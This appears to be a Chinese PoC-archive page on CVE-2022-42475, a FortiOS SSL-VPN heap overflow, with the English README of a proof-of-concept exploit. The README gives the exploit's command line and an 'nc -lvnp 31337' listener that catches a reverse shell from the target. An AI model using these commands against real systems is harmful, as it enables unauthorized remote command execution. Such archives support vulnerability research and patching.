关联漏洞
标题:
Fortinet FortiOS 缓冲区错误漏洞
(CVE-2022-42475)
描述:Fortinet FortiOS是美国飞塔(Fortinet)公司的一套专用于FortiGate网络安全平台上的安全操作系统。该系统为用户提供防火墙、防病毒、IPSec/SSLVPN、Web内容过滤和反垃圾邮件等多种安全功能。 Fortinet FortiOS 存在安全漏洞,该漏洞源于其SSL-VPN允许未经身份认证的远程攻击者通过精心制作的恶意请求实现堆缓冲区溢出导致任意代码或命令执行。
描述
FortiOS buffer overflow vulnerability
介绍
## FortiOS SSL-VPN buffer overflow vulnerability
# cve-2022-42475
https://nvd.nist.gov/vuln/detail/CVE-2022-42475
POC code to exploit the Heap overflow in Fortinet's SSLVPN daemon
# Notes
This is a quick and dirty POC that will probably not work anywhere unless you are extremely lucky. It is version dependent and contains some hardcoded offsets which will most likely change from one system to another.
# Usage
python3 cve-2022-42475.py rhost rport lhost 'command'
``````````
python3 cve-2022-42475.py 192.168.10.1 8443 10.10.1.1 'ls -la /'
``````````
# Listener
The POC using a python command to setup a reverse shell on port 31337
``````````
nc -lvnp 31337
``````````
# Disclaimer
This project is made for educational and ethical testing purposes only. Usage of this tool for attacking targets without prior mutual consent is illegal. Developers assume no liability and are not responsible for any misuse or damage caused by this tool.
# Mentions
Thanks to Alain M - [Twitter : @plopz0r](https://twitter.com/plopz0r)
文件快照
[4.0K] /data/pocs/58ed43a35cdd5c5df252d201583c3134d24e3361
├── [2.4K] cve-2022-42475.py
└── [1.0K] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。